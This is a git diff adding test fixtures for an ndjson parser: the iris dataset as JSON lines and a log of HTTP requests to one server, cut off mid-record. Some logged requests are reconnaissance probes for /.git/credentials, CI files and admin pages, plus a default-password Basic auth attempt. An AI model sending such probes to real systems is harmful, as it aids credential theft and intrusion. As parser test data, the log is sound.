+1,150 @@ +{"Sepal.Length":5.1,"Sepal.Width":3.5,"Petal.Length":1.4,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.9,"Sepal.Width":3,"Petal.Length":1.4,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.7,"Sepal.Width":3.2,"Petal.Length":1.3,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.6,"Sepal.Width":3.1,"Petal.Length":1.5,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5,"Sepal.Width":3.6,"Petal.Length":1.4,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5.4,"Sepal.Width":3.9,"Petal.Length":1.7,"Petal.Width":0.4,"Species":"setosa"} +{"Sepal.Length":4.6,"Sepal.Width":3.4,"Petal.Length":1.4,"Petal.Width":0.3,"Species":"setosa"} +{"Sepal.Length":5,"Sepal.Width":3.4,"Petal.Length":1.5,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.4,"Sepal.Width":2.9,"Petal.Length":1.4,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.9,"Sepal.Width":3.1,"Petal.Length":1.5,"Petal.Width":0.1,"Species":"setosa"} +{"Sepal.Length":5.4,"Sepal.Width":3.7,"Petal.Length":1.5,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.8,"Sepal.Width":3.4,"Petal.Length":1.6,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.8,"Sepal.Width":3,"Petal.Length":1.4,"Petal.Width":0.1,"Species":"setosa"} +{"Sepal.Length":4.3,"Sepal.Width":3,"Petal.Length":1.1,"Petal.Width":0.1,"Species":"setosa"} +{"Sepal.Length":5.8,"Sepal.Width":4,"Petal.Length":1.2,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5.7,"Sepal.Width":4.4,"Petal.Length":1.5,"Petal.Width":0.4,"Species":"setosa"} +{"Sepal.Length":5.4,"Sepal.Width":3.9,"Petal.Length":1.3,"Petal.Width":0.4,"Species":"setosa"} +{"Sepal.Length":5.1,"Sepal.Width":3.5,"Petal.Length":1.4,"Petal.Width":0.3,"Species":"setosa"} +{"Sepal.Length":5.7,"Sepal.Width":3.8,"Petal.Length":1.7,"Petal.Width":0.3,"Species":"setosa"} +{"Sepal.Length":5.1,"Sepal.Width":3.8,"Petal.Length":1.5,"Petal.Width":0.3,"Species":"setosa"} +{"Sepal.Length":5.4,"Sepal.Width":3.4,"Petal.Length":1.7,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5.1,"Sepal.Width":3.7,"Petal.Length":1.5,"Petal.Width":0.4,"Species":"setosa"} +{"Sepal.Length":4.6,"Sepal.Width":3.6,"Petal.Length":1,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5.1,"Sepal.Width":3.3,"Petal.Length":1.7,"Petal.Width":0.5,"Species":"setosa"} +{"Sepal.Length":4.8,"Sepal.Width":3.4,"Petal.Length":1.9,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5,"Sepal.Width":3,"Petal.Length":1.6,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5,"Sepal.Width":3.4,"Petal.Length":1.6,"Petal.Width":0.4,"Species":"setosa"} +{"Sepal.Length":5.2,"Sepal.Width":3.5,"Petal.Length":1.5,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5.2,"Sepal.Width":3.4,"Petal.Length":1.4,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.7,"Sepal.Width":3.2,"Petal.Length":1.6,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.8,"Sepal.Width":3.1,"Petal.Length":1.6,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5.4,"Sepal.Width":3.4,"Petal.Length":1.5,"Petal.Width":0.4,"Species":"setosa"} +{"Sepal.Length":5.2,"Sepal.Width":4.1,"Petal.Length":1.5,"Petal.Width":0.1,"Species":"setosa"} +{"Sepal.Length":5.5,"Sepal.Width":4.2,"Petal.Length":1.4,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.9,"Sepal.Width":3.1,"Petal.Length":1.5,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5,"Sepal.Width":3.2,"Petal.Length":1.2,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5.5,"Sepal.Width":3.5,"Petal.Length":1.3,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.9,"Sepal.Width":3.6,"Petal.Length":1.4,"Petal.Width":0.1,"Species":"setosa"} +{"Sepal.Length":4.4,"Sepal.Width":3,"Petal.Length":1.3,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5.1,"Sepal.Width":3.4,"Petal.Length":1.5,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5,"Sepal.Width":3.5,"Petal.Length":1.3,"Petal.Width":0.3,"Species":"setosa"} +{"Sepal.Length":4.5,"Sepal.Width":2.3,"Petal.Length":1.3,"Petal.Width":0.3,"Species":"setosa"} +{"Sepal.Length":4.4,"Sepal.Width":3.2,"Petal.Length":1.3,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5,"Sepal.Width":3.5,"Petal.Length":1.6,"Petal.Width":0.6,"Species":"setosa"} +{"Sepal.Length":5.1,"Sepal.Width":3.8,"Petal.Length":1.9,"Petal.Width":0.4,"Species":"setosa"} +{"Sepal.Length":4.8,"Sepal.Width":3,"Petal.Length":1.4,"Petal.Width":0.3,"Species":"setosa"} +{"Sepal.Length":5.1,"Sepal.Width":3.8,"Petal.Length":1.6,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":4.6,"Sepal.Width":3.2,"Petal.Length":1.4,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5.3,"Sepal.Width":3.7,"Petal.Length":1.5,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":5,"Sepal.Width":3.3,"Petal.Length":1.4,"Petal.Width":0.2,"Species":"setosa"} +{"Sepal.Length":7,"Sepal.Width":3.2,"Petal.Length":4.7,"Petal.Width":1.4,"Species":"versicolor"} +{"Sepal.Length":6.4,"Sepal.Width":3.2,"Petal.Length":4.5,"Petal.Width":1.5,"Species":"versicolor"} +{"Sepal.Length":6.9,"Sepal.Width":3.1,"Petal.Length":4.9,"Petal.Width":1.5,"Species":"versicolor"} +{"Sepal.Length":5.5,"Sepal.Width":2.3,"Petal.Length":4,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":6.5,"Sepal.Width":2.8,"Petal.Length":4.6,"Petal.Width":1.5,"Species":"versicolor"} +{"Sepal.Length":5.7,"Sepal.Width":2.8,"Petal.Length":4.5,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":6.3,"Sepal.Width":3.3,"Petal.Length":4.7,"Petal.Width":1.6,"Species":"versicolor"} +{"Sepal.Length":4.9,"Sepal.Width":2.4,"Petal.Length":3.3,"Petal.Width":1,"Species":"versicolor"} +{"Sepal.Length":6.6,"Sepal.Width":2.9,"Petal.Length":4.6,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":5.2,"Sepal.Width":2.7,"Petal.Length":3.9,"Petal.Width":1.4,"Species":"versicolor"} +{"Sepal.Length":5,"Sepal.Width":2,"Petal.Length":3.5,"Petal.Width":1,"Species":"versicolor"} +{"Sepal.Length":5.9,"Sepal.Width":3,"Petal.Length":4.2,"Petal.Width":1.5,"Species":"versicolor"} +{"Sepal.Length":6,"Sepal.Width":2.2,"Petal.Length":4,"Petal.Width":1,"Species":"versicolor"} +{"Sepal.Length":6.1,"Sepal.Width":2.9,"Petal.Length":4.7,"Petal.Width":1.4,"Species":"versicolor"} +{"Sepal.Length":5.6,"Sepal.Width":2.9,"Petal.Length":3.6,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":6.7,"Sepal.Width":3.1,"Petal.Length":4.4,"Petal.Width":1.4,"Species":"versicolor"} +{"Sepal.Length":5.6,"Sepal.Width":3,"Petal.Length":4.5,"Petal.Width":1.5,"Species":"versicolor"} +{"Sepal.Length":5.8,"Sepal.Width":2.7,"Petal.Length":4.1,"Petal.Width":1,"Species":"versicolor"} +{"Sepal.Length":6.2,"Sepal.Width":2.2,"Petal.Length":4.5,"Petal.Width":1.5,"Species":"versicolor"} +{"Sepal.Length":5.6,"Sepal.Width":2.5,"Petal.Length":3.9,"Petal.Width":1.1,"Species":"versicolor"} +{"Sepal.Length":5.9,"Sepal.Width":3.2,"Petal.Length":4.8,"Petal.Width":1.8,"Species":"versicolor"} +{"Sepal.Length":6.1,"Sepal.Width":2.8,"Petal.Length":4,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":6.3,"Sepal.Width":2.5,"Petal.Length":4.9,"Petal.Width":1.5,"Species":"versicolor"} +{"Sepal.Length":6.1,"Sepal.Width":2.8,"Petal.Length":4.7,"Petal.Width":1.2,"Species":"versicolor"} +{"Sepal.Length":6.4,"Sepal.Width":2.9,"Petal.Length":4.3,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":6.6,"Sepal.Width":3,"Petal.Length":4.4,"Petal.Width":1.4,"Species":"versicolor"} +{"Sepal.Length":6.8,"Sepal.Width":2.8,"Petal.Length":4.8,"Petal.Width":1.4,"Species":"versicolor"} +{"Sepal.Length":6.7,"Sepal.Width":3,"Petal.Length":5,"Petal.Width":1.7,"Species":"versicolor"} +{"Sepal.Length":6,"Sepal.Width":2.9,"Petal.Length":4.5,"Petal.Width":1.5,"Species":"versicolor"} +{"Sepal.Length":5.7,"Sepal.Width":2.6,"Petal.Length":3.5,"Petal.Width":1,"Species":"versicolor"} +{"Sepal.Length":5.5,"Sepal.Width":2.4,"Petal.Length":3.8,"Petal.Width":1.1,"Species":"versicolor"} +{"Sepal.Length":5.5,"Sepal.Width":2.4,"Petal.Length":3.7,"Petal.Width":1,"Species":"versicolor"} +{"Sepal.Length":5.8,"Sepal.Width":2.7,"Petal.Length":3.9,"Petal.Width":1.2,"Species":"versicolor"} +{"Sepal.Length":6,"Sepal.Width":2.7,"Petal.Length":5.1,"Petal.Width":1.6,"Species":"versicolor"} +{"Sepal.Length":5.4,"Sepal.Width":3,"Petal.Length":4.5,"Petal.Width":1.5,"Species":"versicolor"} +{"Sepal.Length":6,"Sepal.Width":3.4,"Petal.Length":4.5,"Petal.Width":1.6,"Species":"versicolor"} +{"Sepal.Length":6.7,"Sepal.Width":3.1,"Petal.Length":4.7,"Petal.Width":1.5,"Species":"versicolor"} +{"Sepal.Length":6.3,"Sepal.Width":2.3,"Petal.Length":4.4,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":5.6,"Sepal.Width":3,"Petal.Length":4.1,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":5.5,"Sepal.Width":2.5,"Petal.Length":4,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":5.5,"Sepal.Width":2.6,"Petal.Length":4.4,"Petal.Width":1.2,"Species":"versicolor"} +{"Sepal.Length":6.1,"Sepal.Width":3,"Petal.Length":4.6,"Petal.Width":1.4,"Species":"versicolor"} +{"Sepal.Length":5.8,"Sepal.Width":2.6,"Petal.Length":4,"Petal.Width":1.2,"Species":"versicolor"} +{"Sepal.Length":5,"Sepal.Width":2.3,"Petal.Length":3.3,"Petal.Width":1,"Species":"versicolor"} +{"Sepal.Length":5.6,"Sepal.Width":2.7,"Petal.Length":4.2,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":5.7,"Sepal.Width":3,"Petal.Length":4.2,"Petal.Width":1.2,"Species":"versicolor"} +{"Sepal.Length":5.7,"Sepal.Width":2.9,"Petal.Length":4.2,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":6.2,"Sepal.Width":2.9,"Petal.Length":4.3,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":5.1,"Sepal.Width":2.5,"Petal.Length":3,"Petal.Width":1.1,"Species":"versicolor"} +{"Sepal.Length":5.7,"Sepal.Width":2.8,"Petal.Length":4.1,"Petal.Width":1.3,"Species":"versicolor"} +{"Sepal.Length":6.3,"Sepal.Width":3.3,"Petal.Length":6,"Petal.Width":2.5,"Species":"virginica"} +{"Sepal.Length":5.8,"Sepal.Width":2.7,"Petal.Length":5.1,"Petal.Width":1.9,"Species":"virginica"} +{"Sepal.Length":7.1,"Sepal.Width":3,"Petal.Length":5.9,"Petal.Width":2.1,"Species":"virginica"} +{"Sepal.Length":6.3,"Sepal.Width":2.9,"Petal.Length":5.6,"Petal.Width":1.8,"Species":"virginica"} +{"Sepal.Length":6.5,"Sepal.Width":3,"Petal.Length":5.8,"Petal.Width":2.2,"Species":"virginica"} +{"Sepal.Length":7.6,"Sepal.Width":3,"Petal.Length":6.6,"Petal.Width":2.1,"Species":"virginica"} +{"Sepal.Length":4.9,"Sepal.Width":2.5,"Petal.Length":4.5,"Petal.Width":1.7,"Species":"virginica"} +{"Sepal.Length":7.3,"Sepal.Width":2.9,"Petal.Length":6.3,"Petal.Width":1.8,"Species":"virginica"} +{"Sepal.Length":6.7,"Sepal.Width":2.5,"Petal.Length":5.8,"Petal.Width":1.8,"Species":"virginica"} +{"Sepal.Length":7.2,"Sepal.Width":3.6,"Petal.Length":6.1,"Petal.Width":2.5,"Species":"virginica"} +{"Sepal.Length":6.5,"Sepal.Width":3.2,"Petal.Length":5.1,"Petal.Width":2,"Species":"virginica"} +{"Sepal.Length":6.4,"Sepal.Width":2.7,"Petal.Length":5.3,"Petal.Width":1.9,"Species":"virginica"} +{"Sepal.Length":6.8,"Sepal.Width":3,"Petal.Length":5.5,"Petal.Width":2.1,"Species":"virginica"} +{"Sepal.Length":5.7,"Sepal.Width":2.5,"Petal.Length":5,"Petal.Width":2,"Species":"virginica"} +{"Sepal.Length":5.8,"Sepal.Width":2.8,"Petal.Length":5.1,"Petal.Width":2.4,"Species":"virginica"} +{"Sepal.Length":6.4,"Sepal.Width":3.2,"Petal.Length":5.3,"Petal.Width":2.3,"Species":"virginica"} +{"Sepal.Length":6.5,"Sepal.Width":3,"Petal.Length":5.5,"Petal.Width":1.8,"Species":"virginica"} +{"Sepal.Length":7.7,"Sepal.Width":3.8,"Petal.Length":6.7,"Petal.Width":2.2,"Species":"virginica"} +{"Sepal.Length":7.7,"Sepal.Width":2.6,"Petal.Length":6.9,"Petal.Width":2.3,"Species":"virginica"} +{"Sepal.Length":6,"Sepal.Width":2.2,"Petal.Length":5,"Petal.Width":1.5,"Species":"virginica"} +{"Sepal.Length":6.9,"Sepal.Width":3.2,"Petal.Length":5.7,"Petal.Width":2.3,"Species":"virginica"} +{"Sepal.Length":5.6,"Sepal.Width":2.8,"Petal.Length":4.9,"Petal.Width":2,"Species":"virginica"} +{"Sepal.Length":7.7,"Sepal.Width":2.8,"Petal.Length":6.7,"Petal.Width":2,"Species":"virginica"} +{"Sepal.Length":6.3,"Sepal.Width":2.7,"Petal.Length":4.9,"Petal.Width":1.8,"Species":"virginica"} +{"Sepal.Length":6.7,"Sepal.Width":3.3,"Petal.Length":5.7,"Petal.Width":2.1,"Species":"virginica"} +{"Sepal.Length":7.2,"Sepal.Width":3.2,"Petal.Length":6,"Petal.Width":1.8,"Species":"virginica"} +{"Sepal.Length":6.2,"Sepal.Width":2.8,"Petal.Length":4.8,"Petal.Width":1.8,"Species":"virginica"} +{"Sepal.Length":6.1,"Sepal.Width":3,"Petal.Length":4.9,"Petal.Width":1.8,"Species":"virginica"} +{"Sepal.Length":6.4,"Sepal.Width":2.8,"Petal.Length":5.6,"Petal.Width":2.1,"Species":"virginica"} +{"Sepal.Length":7.2,"Sepal.Width":3,"Petal.Length":5.8,"Petal.Width":1.6,"Species":"virginica"} +{"Sepal.Length":7.4,"Sepal.Width":2.8,"Petal.Length":6.1,"Petal.Width":1.9,"Species":"virginica"} +{"Sepal.Length":7.9,"Sepal.Width":3.8,"Petal.Length":6.4,"Petal.Width":2,"Species":"virginica"} +{"Sepal.Length":6.4,"Sepal.Width":2.8,"Petal.Length":5.6,"Petal.Width":2.2,"Species":"virginica"} +{"Sepal.Length":6.3,"Sepal.Width":2.8,"Petal.Length":5.1,"Petal.Width":1.5,"Species":"virginica"} +{"Sepal.Length":6.1,"Sepal.Width":2.6,"Petal.Length":5.6,"Petal.Width":1.4,"Species":"virginica"} +{"Sepal.Length":7.7,"Sepal.Width":3,"Petal.Length":6.1,"Petal.Width":2.3,"Species":"virginica"} +{"Sepal.Length":6.3,"Sepal.Width":3.4,"Petal.Length":5.6,"Petal.Width":2.4,"Species":"virginica"} +{"Sepal.Length":6.4,"Sepal.Width":3.1,"Petal.Length":5.5,"Petal.Width":1.8,"Species":"virginica"} +{"Sepal.Length":6,"Sepal.Width":3,"Petal.Length":4.8,"Petal.Width":1.8,"Species":"virginica"} +{"Sepal.Length":6.9,"Sepal.Width":3.1,"Petal.Length":5.4,"Petal.Width":2.1,"Species":"virginica"} +{"Sepal.Length":6.7,"Sepal.Width":3.1,"Petal.Length":5.6,"Petal.Width":2.4,"Species":"virginica"} +{"Sepal.Length":6.9,"Sepal.Width":3.1,"Petal.Length":5.1,"Petal.Width":2.3,"Species":"virginica"} +{"Sepal.Length":5.8,"Sepal.Width":2.7,"Petal.Length":5.1,"Petal.Width":1.9,"Species":"virginica"} +{"Sepal.Length":6.8,"Sepal.Width":3.2,"Petal.Length":5.9,"Petal.Width":2.3,"Species":"virginica"} +{"Sepal.Length":6.7,"Sepal.Width":3.3,"Petal.Length":5.7,"Petal.Width":2.5,"Species":"virginica"} +{"Sepal.Length":6.7,"Sepal.Width":3,"Petal.Length":5.2,"Petal.Width":2.3,"Species":"virginica"} +{"Sepal.Length":6.3,"Sepal.Width":2.5,"Petal.Length":5,"Petal.Width":1.9,"Species":"virginica"} +{"Sepal.Length":6.5,"Sepal.Width":3,"Petal.Length":5.2,"Petal.Width":2,"Species":"virginica"} +{"Sepal.Length":6.2,"Sepal.Width":3.4,"Petal.Length":5.4,"Petal.Width":2.3,"Species":"virginica"} +{"Sepal.Length":5.9,"Sepal.Width":3,"Petal.Length":5.1,"Petal.Width":1.8,"Species":"virginica"} diff --git a/tests/testthat/ndjson/iris.ndjson.gz b/tests/testthat/ndjson/iris.ndjson.gz new file mode 100644 index 0000000..68ca2a1 Binary files /dev/null and b/tests/testthat/ndjson/iris.ndjson.gz differ diff --git a/tests/testthat/ndjson/ndjson-long-lines-10k-issue19.ndjson b/tests/testthat/ndjson/ndjson-long-lines-10k-issue19.ndjson new file mode 100644 index 0000000..b8e135e --- /dev/null +++ b/tests/testthat/ndjson/ndjson-long-lines-10k-issue19.ndjson @@ -0,0 +1,749 @@ +{"ip": "90.169.110.161", "Accept": "text/plain,text/html", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "18.119.179.222", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15", "Method": "GET", "Path": "/.git/credentials", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "93.174.95.106", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "identity", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "93.174.95.106", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "93.174.95.106", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/sitemap.xml", "Http_Version": "HTTP/1.1"} +{"ip": "93.174.95.106", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/.well-known/security.txt", "Http_Version": "HTTP/1.1"} +{"ip": "93.174.95.106", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "192.241.199.82", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/druid/index.html", "Http_Version": "HTTP/1.1"} +{"ip": "180.149.125.172", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "141.98.11.52", "Host": "116.202.22.148:8080", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "162.216.149.151", "Host": "116.202.22.148:80", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "103.61.224.82", "Accept": "*/*", "Accept_Language": "zh-cn,en-us;q=0.5", "Connection": "Keep-Alive", "Host": "116.202.22.148:8080", "User_Agent": "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705", "Method": "GET", "Path": "/manager/html", "Http_Version": "HTTP/1.1"} +{"ip": "120.0.52.55", "Accept": "*/*", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "58.18.161.236", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "58.19.50.55", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "34.67.136.168", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "66.240.192.138", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "identity", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "66.240.192.138", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "66.240.192.138", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/sitemap.xml", "Http_Version": "HTTP/1.1"} +{"ip": "66.240.192.138", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/.well-known/security.txt", "Http_Version": "HTTP/1.1"} +{"ip": "66.240.192.138", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "94.102.49.193", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "identity", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "94.102.49.193", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "94.102.49.193", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/sitemap.xml", "Http_Version": "HTTP/1.1"} +{"ip": "94.102.49.193", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/.well-known/security.txt", "Http_Version": "HTTP/1.1"} +{"ip": "94.102.49.193", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "143.178.110.77", "Accept": "text/plain,text/html", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "46.174.191.29", "Accept": "*/*", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "45.128.232.125", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "91.48.115.148", "Accept": "text/plain,text/html", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "84.54.51.192", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "205.210.31.237", "Host": "cdn.irserv.sbs", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "179.43.128.106", "Authorization": "Basic YWRtaW46MTIzNA==", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "118.169.146.25", "Accept": "text/plain,text/html", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "38.7.199.228", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "close", "Host": "116.202.22.148:80", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.36.81.33", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.237.98.53", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.237.98.53", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.1144", "Method": "GET", "Path": "/admin/config.php", "Http_Version": "HTTP/1.1"} +{"ip": "3.84.188.63", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "Method": "GET", "Path": "/.gitlab-ci.yml", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": 